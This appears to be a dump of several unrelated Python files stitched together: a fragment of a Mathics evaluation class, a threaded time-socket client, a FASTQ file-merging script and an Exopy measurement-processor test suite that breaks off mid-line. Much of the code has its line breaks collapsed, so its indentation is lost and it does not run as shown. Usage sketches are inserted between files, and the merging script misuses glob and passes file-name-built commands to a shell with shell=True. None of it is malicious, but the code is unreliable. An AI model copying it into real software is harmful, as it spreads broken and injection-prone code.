"System`Messages", pattern, self ) if text is None: text = String("Message %s::%s not found." 
% (symbol_shortname, tag)) text = self.format_output( Expression("StringForm", text, *(from_python(arg) for arg in args)), "text" ) self.out.append(Message(symbol_shortname, tag, text)) self.output.out(self.out[-1]) def print_out(self, text) -> None: from mathics.core.expression import from_python text = self.format_output(from_python(text), "text") self.out.append(Print(text)) self.output.out(self.out[-1]) if settings.DEBUG_PRINT: print("OUT: " + text) def error(self, symbol, tag, *args) -> None: # Temporarily reset the recursion limit, to allow the message being # formatted self.recursion_depth, depth = 0, self.recursion_depth try: self.message(symbol, tag, *args) finally: self.recursion_depth = depth raise AbortInterrupt def error_args(self, symbol, given, *needed) -> None: self.message_args(symbol, given, *needed) raise AbortInterrupt def message_args(self, symbol, given, *needed) -> None: from mathics.core.expression import Symbol if len(needed) == 1: needed = needed[0] if given > 1 and needed > 1: self.message(symbol, "argrx", Symbol(symbol), given, needed) elif given == 1: self.message(symbol, "argr", Symbol(symbol), needed) elif needed == 1: self.message(symbol, "argx", Symbol(symbol), given) elif len(needed) == 2: if given == 1: self.message(symbol, "argtu", Symbol(symbol), *needed) else: self.message(symbol, "argt", Symbol(symbol), *needed) else: raise NotImplementedError def check_stopped(self) -> None: if self.stopped: raise TimeoutInterrupt def inc_recursion_depth(self) -> None: self.check_stopped() limit = self.definitions.get_config_value( "$RecursionLimit", MAX_RECURSION_DEPTH ) if limit is not None: if limit < 20: limit = 20 self.recursion_depth += 1 if self.recursion_depth > limit: self.error("$RecursionLimit", "reclim", limit) def dec_recursion_depth(self) -> None: self.recursion_depth -= 1 def add_listener(self, tag, listener) -> None: existing = self.listeners.get(tag) if existing is None: existing = self.listeners[tag] = [] existing.insert(0, listener) def remove_listener(self, tag, listener) -> None: self.listeners.get(tag).remove(listener) def publish(self, tag, *args, **kwargs) -> None: listeners = self.listeners.get(tag, []) for listener in listeners: if listener(*args, **kwargs): break
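# Hedged usage sketch for the Evaluation class above (not part of the original
# module). Assumes a working Mathics install; Definitions(add_builtin=True) is
# an assumption about that constructor, and the printed output is illustrative.
from mathics.core.definitions import Definitions

defs = Definitions(add_builtin=True)
evaluation = Evaluation(definitions=defs, format="text")
res = evaluation.parse_evaluate("Integrate[x^2, x]", timeout=10)
if res is not None:
    print(res.result)            # formatted OutputForm text, e.g. x ^ 3 / 3
    for message in res.out:      # any Message/Print side output
        print(message)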
timeclient.py
#!/usr/bin/env python
# -*- coding:UTF-8 -*-

from socket import AF_INET, SOCK_STREAM, socket
from threading import Thread


def gettime(address):
    # Connect to a time server, read a single reply and print it
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect(address)
    tm = sock.recv(1024)
    sock.close()
    print("The time is %s" % tm.decode('ascii'))


t1 = [Thread(target=gettime, args=(('localhost', 10000),)) for i in range(100)]
t2 = [Thread(target=gettime, args=(('localhost', 11000),)) for i in range(100)]

# map(None, t1, t2) was a Python 2 idiom and fails on Python 3; zip() pairs the two
# thread lists. start() runs each thread concurrently (run() would execute the target
# in the calling thread), and join() waits for all of them to finish.
for a, b in zip(t1, t2):
    a.start()
    b.start()
for a, b in zip(t1, t2):
    a.join()
    b.join()
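
# The client above assumes time servers listening on localhost ports 10000 and 11000;
# no such server appears in this file, so the following is a hedged companion sketch
# (the ports and the plain-ASCII reply format are assumptions, not taken from the source).
from socket import SOL_SOCKET, SO_REUSEADDR
from time import ctime


def serve_time(port=10000):
    # Accept one connection at a time and reply with the current local time.
    srv = socket(AF_INET, SOCK_STREAM)
    srv.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    srv.bind(('localhost', port))
    srv.listen(5)
    while True:
        client, _ = srv.accept()
        client.sendall(ctime().encode('ascii'))
        client.close()

# serve_time(10000) would be run from a separate interpreter before starting the
# client threads above; it is not called here so importing this script stays unchanged.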
merger.py
#!/usr/bin/env python from glob import glob from accessoryFunctions.accessoryFunctions import * import shutil __author__ = 'adamkoziol' def relativesymlink(src_file, dest_file): """ https://stackoverflow.com/questions/9793631/creating-a-relative-symlink-in-python-without-using-os-chdir :param src_file: the file to be linked :param dest_file: the path and filename to which the file is to be linked """ # Perform relative symlinking try: os.symlink( # Find the relative path for the source file and the destination file os.path.relpath(src_file), os.path.relpath(dest_file) ) # Except os errors except OSError as exception: # If the os error is anything but directory exists, then raise if exception.errno != errno.EEXIST: raise class Merger(object): def idseek(self): import pandas nesteddictionary = dict() # Create a list of all the lines in the file: open(self.idfile).readlines() # Create a lambda function # Map the list to the lambda function and split the list based on the delimiter: x.split(self.delimiter) # List comprehension of individual seq IDs without whitespace: [x.rstrip() for x in ...] # self.seqids = map(lambda x: [x.rstrip() for x in x.split(self.delimiter)], open(self.idfile).readlines()) dictionary = pandas.read_excel(self.idfile).to_dict() # Iterate through the dictionary - each header from the excel file for header in dictionary: # Sample is the primary key, and value is the value of the cell for that primary key + header combination for sample, value in dictionary[header].items(): # Update the dictionary with the new data try: nesteddictionary[sample].update({header: value}) # Create the nested dictionary if it hasn't been created yet except KeyError: nesteddictionary[sample] = dict() nesteddictionary[sample].update({header: value}) # Create objects for each of the samples, rather than using a nested dictionary. It may have been possible to # skip the creation of the nested dictionary, and create the objects from the original dictionary, but there # seemed to be too many possible places for something to go wrong for line in nesteddictionary: # Create an object for each sample metadata = MetadataObject() # Set the name of the metadata to be the primary key for the sample from the excel file metadata.name = line # Find the headers and values for every sample for header, value in nesteddictionary[line].items(): # Try/except for value.encode() - some of the value are type int, so they cannot be encoded try: # Create each attribute - use the header (in lowercase, and spaces removed) as the attribute name, # and the value as the attribute value setattr(metadata, header.replace(' ', '').lower(), str(value)) except AttributeError: setattr(metadata, header.replace(' ', '').lower(), value) # Append the object to the list of objects self.metadata.append(metadata) for sample in self.metadata: # Sort the seqIDs sample.merge = sorted(sample.merge.split(self.delimiter)) def idfind(self): """Find the fastq files associated with the seq IDs pulled from the seq ID file. Populate a MetadataObject with the name of the merged files as well as the fastq file names and paths""" for sample in self.metadata: # Create the general category for the MetadataObject sample.general = GenObject() sample.general.fastqfiles = list() for ids in sample.merge: # Ensure that the id exists. Dues to the way the ids were pulled from the file, newline characters # will be entered into the list. 
Skip them if ids: # Glob for files in the path with the seq ID and 'fastq' idfile = glob.glob('{}{}*fastq*'.format(self.path, ids)) # Assertion to ensure that all the files specified in :self.idfile are present in the path assert idfile, 'Cannot find files for seq ID: {}. Please check that the seqIDs ' \ 'provided in the seq ID file match the files present in the path'.format(ids) # Append the fastq file and path and the seq ID to the appropriate list sample.general.fastqfiles.append(idfile) def idmerge(self): """Merge the files together""" from threading import Thread # for i in range(self.cpus): # Send the threads to the merge method. :args is empty as I'm using threads = Thread(target=self.merge, args=()) # Set the daemon to true - something to do with thread management threads.setDaemon(True) # Start the threading threads.start() for sample in self.metadata: # Initialise strings to hold the forward and reverse fastq files forwardfiles = list() reversefiles = list() # Create the output directory sample.general.outputdir = '{}{}'.format(self.path, sample.name) make_path(sample.general.outputdir) # Iterate through the samples for files in sample.general.fastqfiles: # Find the forward and reverse files (forward files must have have either _R1_ or _1_ for fastq in files: if '_R1_' in fastq or '_1_' in fastq or '_1.' in fastq: forwardfiles.append(fastq) elif '_R2_' in fastq or '_2_' in fastq or '_2.' in fastq: reversefiles.append(fastq) # Add the files to the processing queue sample.general.outputforward = '{}/{}_S1_L001_R1_001.fastq.gz'.format(sample.general.outputdir, sample.name) sample.general.outputreverse = '{}/{}_S1_L001_R2_001.fastq.gz'.format(sample.general.outputdir, sample.name) # Add the command object to self.data sample.commands = GenObject() sample.commands.forwardmerge = 'cat {} > {}'.format(' '.join(forwardfiles), sample.general.outputforward) sample.commands.reversemerge = 'cat {} > {}'.format(' '.join(reversefiles), sample.general.outputreverse) # Add the commands to the queue self.mergequeue.put((sample.commands.forwardmerge, sample.general.outputforward)) self.mergequeue.put((sample.commands.reversemerge, sample.general.outputreverse)) # Join the threads self.mergequeue.join() def merge(self): while True: # while daemon # Unpack the merge command and the output file from the queue (mergecommand, outputfile) = self.mergequeue.get() # Don't run the command if the output file exists if not os.path.isfile(outputfile): try: self.execute(mergecommand) except KeyboardInterrupt: printtime(u'Keyboard interrupt! 
The system call will not stop until it is finished.', self.start) self.mergequeue.empty() try: os.remove(outputfile) except IOError: pass sys.exit() # Signal to mergequeue that job is done self.mergequeue.task_done() def filelink(self): # If the creation of a sample sheet is necessary if self.samplesheet: # Extract the path of the current script from the full path + file name samplesheet = open('{}/SampleSheet.csv'.format(os.path.split(os.path.abspath(__file__))[0])).readlines() # Iterate through each merged file for sample in self.data: # Append enough information to the list to allow the pipeline to work samplesheet.append('{},{},,,NA,NA,NA,NA,NA,NA\n'.format(sample.name, sample.name)) # Initialise the name and path of the output sample sheet outsamplesheet = '{}/SampleSheet.csv'.format(self.assemblypath) # Don't overwrite a sample sheet already present in the directory if not os.path.isfile(outsamplesheet): # Open the file to write and write to it with open(outsamplesheet, 'w') as writesheet: writesheet.write(''.join(samplesheet)) # Optionally copy if self.copy: make_path('{}/BestAssemblies'.format(self.assemblypath)) # Link the files to the assembly path for sample in self.metadata: try: if self.copy: shutil.copyfile(sample.general.outputforward, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputforward))) shutil.copyfile(sample.general.outputreverse, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputreverse))) else: if self.relativepaths: relativesymlink(sample.general.outputforward, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputforward))) relativesymlink(sample.general.outputreverse, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputreverse))) else: os.symlink(sample.general.outputforward, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputforward))) os.symlink(sample.general.outputreverse, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputreverse))) # Except os errors except OSError as exception: # If the os error is anything but directory exists, then raise if exception.errno != errno.EEXIST: raise # Remove the BestAssemblies directory if necessary if self.copy: os.removedirs('{}/BestAssemblies'.format(self.assemblypath)) def execute(self, command, outfile=""): """ Allows for dots to be printed to the terminal while waiting for a long system call to run :param command: the command to be executed :param outfile: optional string of an output file from https://stackoverflow.com/questions/4417546/constantly-print-subprocess-output-while-process-is-running """ import time from subprocess import Popen, PIPE, STDOUT # Initialise the starting time start = int(time.time()) maxtime = 0 # Run the commands - direct stdout to PIPE and stderr to stdout process = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT) # Create the output file - if not provided, then nothing should happen writeout = open(outfile, "ab+") if outfile else "" # Poll process for new output until finished while True: # If an output file name is provided if outfile: # Get stdout into a variable nextline = process.stdout.readline() # Print stdout to the file writeout.write(nextline) # Break from the loop if the command is finished if process.poll() is not None: break # Adding sleep commands slowed down this method when there was lots of output. Difference between the start # time of the analysis and the current time. 
Action on each second passed currenttime = int(time.time()) # As each thread will print a dot at the same time, often the dots printed to the terminal do not look # even. Instead of 80 per line, there are sometimes around 78-82, or just one. Having this random number # seems to fix this from random import randint # Set the number to be a random integer between 0 and 999 number = randint(0, 999) if currenttime - start > maxtime + number: # Set the max time for each iteration maxtime = currenttime - start # Print up to 80 dots on a line, with a one second delay between each dot if self.count <= 80: sys.stdout.write('.') sys.stdout.flush() self.count += 1 # Once there are 80 dots on a line, start a new line with the the time else: sys.stdout.write('\n.') sys.stdout.flush() self.count = 1 # Close the output file writeout.close() if outfile else "" def __init__(self, args, start): """ :param args: list of arguments passed to the script :param start: the start time Initialises the variables required for this class """ from queue import Queue import multiprocessing # Define variables from the arguments - there may be a more streamlined way to do this self.args = args self.path = os.path.join(args['path'], "") self.start = start # Determine which seq ID file to use # If an argument for the file is provided, use it if args['f']: self.idfile = args['f'] # If there is no path information present in the argument, use :path + the file name if '/' not in self.idfile: self.idfile = '{}{}'.format(self.path, self.idfile) assert os.path.isfile(self.idfile), 'Could not find the seq ID file. Please double check the supplied' \ 'arguments' # If no argument is provided, try to find the file else: # Look for .txt, .tsv, or .csv files self.idfile = map(lambda x: glob('{}*{}'.format(self.path, x)), ['.txt', '.csv', '.tsv']) # Initialise the file count filecount = 0 # Iterate through each extension for extension in self.idfile: if extension: # If a single file with that extension was found, set :self.idfile to that file extensiontype = extension[0].split('.')[1] assert len(extension) == 1, u'Too many .{} entries found for the ID file.'.format(extensiontype) self.idfile = extension[0] # Increment the count filecount += 1 # Assertions to exit if there are too many or too few potential seq ID files assert filecount <= 1, u'Too many potential ID files found. 
Please check that there is only one .txt,' \ u' .tsv, or .csv file in the path' assert filecount >= 1, u'Could not find a seq ID file with a .txt, .tsv, or .csv extension in the path' # Assertion to ensure that the seq ID file exists assert os.path.isfile(self.idfile), u'seqID file cannot be found {0!r:s}'.format(self.idfile) printtime(u'Using {} as the file containing seq IDs to be merged'.format(self.idfile), self.start) # Set the delimiter self.delimiter = args['d'].lower() if self.delimiter == 'space': self.delimiter = ' ' elif self.delimiter == 'tab': self.delimiter = '\t' elif self.delimiter == 'comma' or self.delimiter == ',': self.delimiter = ',' # Determine if sorting the columns is desired self.sort = args['Sort'] # Initialise class variables self.seqids = "" self.seqfiles = list() self.data = list() self.cpus = multiprocessing.cpu_count() self.mergequeue = Queue(maxsize=self.cpus) self.count = 0 self.metadata = list() # Find which IDs need to be merged together from the text file self.idseek() # Find the files corresponding to the IDs self.idfind() # Merge the files together self.idmerge() # Exit printtime(u'Files have been successfully merged.', self.start) # Set the optional arguments self.copy = args['copy'] if args['copy'] else False self.relativepaths = args['relativePaths'] if args['relativePaths'] else False # Optionally run the file linking method if args['linkFiles'] or args['copy']: # Create the assembly folder and path from the supplied arguments self.assemblyfolder = args['o'] if args['o'] else self.path.split('/')[-2] self.assemblypath = os.path.join(args['a'], "") + self.assemblyfolder make_path(self.assemblypath) assert os.path.isdir(self.assemblypath), 'Could not create the destination folder. Please double-check ' \ 'your supplied arguments' self.samplesheet = args['samplesheet'] # Run the linking self.filelink() printtime(u'Files have been successfully linked to the assembly folder. Analysis complete.', self.start) sys.exit() # If the script is called from the command line, then call the argument parser if __name__ == '__main__': from time import time from argparse import ArgumentParser import subprocess # Extract the path of the current script from the full path + file name homepath = os.path.split(os.path.abspath(__file__))[0] # Find the commit of the script by running a command to change to the directory containing the script and run # a git command to return the short version of the commit hash commit = subprocess.Popen('cd {} && git rev-parse --short HEAD'.format(homepath), shell=True, stdout=subprocess.PIPE).communicate()[0].rstrip() # Parser for arguments parser = ArgumentParser(description='Merges seqIDs') parser.add_argument('-v', '--version', action='version', version='%(prog)s commit {}'.format(commit)) parser.add_argument('path', help='Specify path') parser.add_argument('-f', metavar='idFile', help='The name and path of the file containing seqIDs to merge and reassemble. If this file is' ' in the path, then including the path is not necessary for this argument. Alternatively,' ' as long as the file has a .txt, .csv, or. tsv file extension, you can omit this argument' ' altogether. Note: if you don\'t supply the argument, and there are multiple files with ' 'any of these extensions, the program will fail') parser.add_argument('-d', metavar='delimiter', default='space', help='The delimiter used to separate seqIDs. Popular options are "space", "tab", and "comma". ' 'Default is space. Note: you can use custom delimiters. 
Just be aware that a delimiter, ' 'such as "-" will break the program if there are hyphens in your sample names') parser.add_argument('-S', '--Sort', default=False, action='store_true', help='Optionally sort the seqIDs to merge. seqIDs will be sorted by year, then ID.') parser.add_argument('-l', '--linkFiles', action='store_true', help='Optionally link the files to the \'WGS_Spades\' directory. Note that this is specific to' ' the local setup here and is not recommended unless your set-up is similar') parser.add_argument('-r', '--relativePaths', action='store_true', help='Optionally use relative paths instead of absolute paths when linking the files. ' 'The pipeline does not work with relative paths yet') parser.add_argument('-a', metavar='assemblyLocation', default='/nas/akoziol/WGS_Spades/', help='Path to a folder where files are automatically assembled using a cluster. Only relevant ' 'if linking the files') parser.add_argument('-o', metavar='outputdirectory', help='A directory name to use when linking the merged .fastq files to the WGS_Spades folder ' 'e.g. 2016-01-19_ListeriaMerged. If this is not provided, then the program will use the ' 'name of lowest folder in the path e.g. \'files\' will be used if the path ' 'is \'/path/to/files\'') parser.add_argument('-s', '--samplesheet', action='store_true', help='Depending on the version of the assembly pipeline, a sample sheet is required. ' 'Including this option will populate a basic sample sheet with enough information in order' ' to allow the pipeline to proceed') parser.add_argument('-c', '--copy', action='store_true', help='Copies rather than symbolically linking the files to the destination folder') # Get the arguments into a list arguments = vars(parser.parse_args()) # Get the starting time for use in print statements starttime = time() # Run the pipeline output = Merger(arguments, starttime)
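
# Hedged usage sketch for the script above (all paths, file names, and delimiter
# choices are illustrative, not taken from the source):
#
#   python merger.py /data/fastq_files -f seqids.csv -d comma
#
# or, programmatically, by passing the same argument dictionary argparse would build:
#
# from time import time
# args = {'path': '/data/fastq_files', 'f': 'seqids.csv', 'd': 'comma', 'Sort': False,
#         'copy': False, 'relativePaths': False, 'linkFiles': False,
#         'a': '/nas/akoziol/WGS_Spades/', 'o': None, 'samplesheet': False}
# Merger(args, time())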
test_processor.py
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # Copyright 2015-2018 by Exopy Authors, see AUTHORS for more details. # # Distributed under the terms of the BSD license. # # The full license is in the file LICENCE, distributed with this software. # ----------------------------------------------------------------------------- """Test the working of the measurement processor. """ import enaml import pytest from threading import Thread from exopy.measurement.measurement import Measurement from exopy.tasks.api import RootTask from exopy.testing.util import ErrorDialogException with enaml.imports(): from enaml.workbench.ui.ui_manifest import UIManifest from exopy.tasks.manifest import TasksManagerManifest from exopy.testing.measurement.contributions import Flags @pytest.fixture def measurement_with_tools(measurement, tmpdir): """Create a measurement with all dummy tools attached. """ measurement.add_tool('pre-hook', 'dummy') measurement.add_tool('post-hook', 'dummy') measurement.add_tool('monitor', 'dummy') measurement.root_task.default_path = str(tmpdir) return measurement @pytest.fixture def processor(exopy_qtbot, measurement_workbench, measurement): """Fixture starting the measurement plugin and returning the processor. Use app because we need run the event loop """ # measurement ensures that contributions are there measurement_workbench.register(UIManifest()) measurement_workbench.register(TasksManagerManifest()) plugin = measurement_workbench.get_plugin('exopy.measurement') plugin.selected_engine = 'dummy' return plugin.processor def process_and_join_thread(bot, thread, timeout=0.1): """Process application events and join a thread. """ def test_func(): thread.join(timeout) assert not thread.is_alive() bot.wait_until(test_func, timeout=20e3) def test_setting_continuous_processing(processor): """Test that the post-setter does update the flag. """ processor.continuous_processing = False assert not processor._state.test('continuous_processing') processor.continuous_processing = True assert processor._state.test('continuous_processing') @pytest.mark.timeout(10) def test_starting_measurement_no_measurement_enqueued(exopy_qtbot, processor): """Test starting next measurement in the queue when no measurements are enqueued. """ processor.start_measurement(None) process_and_join_thread(exopy_qtbot, processor._thread) def assert_inactive(): assert not processor.active exopy_qtbot.wait_until(assert_inactive) def test_starting_measurement_thread_not_dying(exopy_qtbot, processor, measurement): """Test starting but failing to stop the backgground thread. """ class FalseThread(object): def __init__(self, processor): self.state = processor._state def is_alive(self): return True def join(self, timeout): if not self.state.test('stop_processing'): raise Exception() processor._thread = FalseThread(processor) core = processor.plugin.workbench.get_plugin('enaml.workbench.core') core.invoke_command('exopy.app.errors.enter_error_gathering') processor.start_measurement(None) exopy_qtbot.wait(100) with pytest.raises(ErrorDialogException): core.invoke_command('exopy.app.errors.exit_error_gathering') @pytest.mark.timeout(60) def test_running_full_measurement(exopy_qtbot, processor, measurement_with_tools, dialog_sleep, tmpdir): """Test running a complete measurement with pre/post-hooks and monitor. 
""" plugin = processor.plugin.workbench.get_plugin('exopy.measurement') measure2 = Measurement(plugin=plugin, root_task=RootTask(), name='Dummy', id='002') processor.plugin.enqueued_measurements.add(measure2) measurement = measurement_with_tools processor.continuous_processing = False processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) assert measurement is processor.running_measurement assert measurement.status == 'RUNNING' assert tmpdir.listdir() pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) assert processor.monitors_window assert processor.monitors_window.measurement is measurement assert measurement.monitors['dummy'].running exopy_qtbot.wait(dialog_sleep) processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) assert measurement.task_execution_result assert not measurement.monitors['dummy'].running assert measurement.monitors['dummy'].received_news post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'COMPLETED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected assert measure2.status == 'READY' @pytest.mark.timeout(60) def test_running_measurement_whose_runtime_are_unavailable( processor, monkeypatch, measurement_with_tools, exopy_qtbot): """Test running whose runtime dependencies are unavailable. """ monkeypatch.setattr(Flags, 'RUNTIME2_UNAVAILABLE', True) processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) process_and_join_thread(exopy_qtbot, processor._thread) assert measurement_with_tools.status == 'SKIPPED' @pytest.mark.timeout(60) def test_running_measurement_failing_checks(exopy_qtbot, processor, measurement_with_tools): """Test running a measurement failing to pass the tests. """ measurement_with_tools.pre_hooks['dummy'].fail_check = True processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) process_and_join_thread(exopy_qtbot, processor._thread) assert measurement_with_tools.status == 'FAILED' assert 'checks' in measurement_with_tools.infos m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_running_measurement_failing_pre_hooks(exopy_qtbot, processor, measurement_with_tools): """Test running a measurement whose pre-hooks fail to execute. 
""" measurement_with_tools.pre_hooks['dummy'].fail_run = True processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement_with_tools.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) exopy_qtbot.wait(10) pre_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement_with_tools.status == 'FAILED' assert 'pre-execution' in measurement_with_tools.infos m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_running_measurement_failing_main_task(exopy_qtbot, processor, measurement_with_tools): """Test running a measurement whose pre-hooks fail to execute. """ measurement = measurement_with_tools processor.engine = processor.plugin.create('engine', 'dummy') processor.engine.fail_perform = True processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) exopy_qtbot.wait(10) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'FAILED' assert 'main task' in measurement_with_tools.infos m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_running_measurement_failing_post_hooks(exopy_qtbot, processor, measurement_with_tools): """Test running a measurement whose post-hooks fail to execute. """ measurement = measurement_with_tools measurement_with_tools.post_hooks['dummy'].fail_run = True processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement_with_tools.status == 'FAILED' assert 'post-execution' in measurement_with_tools.infos m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_running_forced_enqueued_measurement(exopy_qtbot, processor, measurement_with_tools): """Test running a measurement about which we know that checks are failing. 
""" measurement = measurement_with_tools measurement.forced_enqueued = True measurement.pre_hooks['dummy'].fail_check = True processor.start_measurement(measurement_with_tools) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) assert processor.engine.measurement_force_enqueued processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) @pytest.mark.parametrize('mode', ['between hooks', 'after hooks']) @pytest.mark.timeout(60) def test_stopping_measurement_while_preprocessing(exopy_qtbot, mode, processor, measurement_with_tools): """Test asking the processor to stop while is is running the pre-hooks. The post-hooks should not be run. """ measurement = measurement_with_tools if mode == 'between hooks': # Will see the difference only in coverage measurement.move_tool('pre-hook', 0, 1) processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) processor.stop_measurement(no_post_exec=True) assert pre_hook.stop_called pre_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_stopping_measurement_while_running_main(exopy_qtbot, processor, measurement_with_tools): """Test asking the processor to stop while is is running the main task. The post-hooks should be run. """ measurement = measurement_with_tools processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.stop_measurement() processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_stopping_measurement_while_postprocessing(exopy_qtbot, processor, measurement_with_tools): """Test asking the processor to stop while is is running the post hooks. 
""" measurement = measurement_with_tools measurement.add_tool('post-hook', 'dummy2') measurement.post_hooks['dummy2'].fail_run = True processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.engine.go_on.set() post_hook = measurement.post_hooks['dummy'] exopy_qtbot.wait_until(lambda: post_hook.waiting.wait(0.04), timeout=40e3) processor.stop_measurement(force=True) assert post_hook.stop_called post_hook.go_on.set() process_and_join_thread(exopy_qtbot, processor._thread) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected @pytest.mark.timeout(60) def test_stopping_processing(exopy_qtbot, processor, measurement_with_tools): """Test stopping processing while running the main task.. """ plugin = processor.plugin.workbench.get_plugin('exopy.measurement') measure2 = Measurement(plugin=plugin, root_task=RootTask(), name='Dummy', id='002') processor.plugin.enqueued_measurements.add(measure2) measurement = measurement_with_tools processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) pre_hook.go_on.set() exopy_qtbot.wait_until(lambda: processor.engine.waiting.wait(0.04), timeout=40e3) processor.stop_processing(no_post_exec=True) processor.engine.go_on.set() def wait(timeout): processor._thread.join(timeout) assert not processor._thread.is_alive() exopy_qtbot.wait_until(lambda: wait(0.04), timeout=40e3) assert measurement.status == 'INTERRUPTED' m = processor.plugin.workbench.get_manifest('test.measurement') assert not m.find('runtime_dummy1').collected assert not m.find('runtime_dummy2').collected assert measure2.status == 'READY' @pytest.mark.timeout(60) def test_stopping_processing_in_hook(exopy_qtbot, processor, measurement_with_tools): """Test stopping processing while running a hook. """ plugin = processor.plugin.workbench.get_plugin('exopy.measurement') measure2 = Measurement(plugin=plugin, root_task=RootTask(), name='Dummy', id='002') processor.plugin.enqueued_measurements.add(measure2) measurement = measurement_with_tools processor.start_measurement(measurement) def assert_active(): assert processor.active exopy_qtbot.wait_until(assert_active) pre_hook = measurement.pre_hooks['dummy'] def assert_wait(): assert pre_hook.waiting.wait(5) exopy_qtbot.wait_until(assert_wait, timeout=50e3) processor.stop_processing(no_post_exec=True) pre_hook.go_on.set() def wait(timeout): processor._thread.join(timeout) assert not processor._thread.is_alive() exopy_qtbot.wait_until(lambda: wait(0.04), 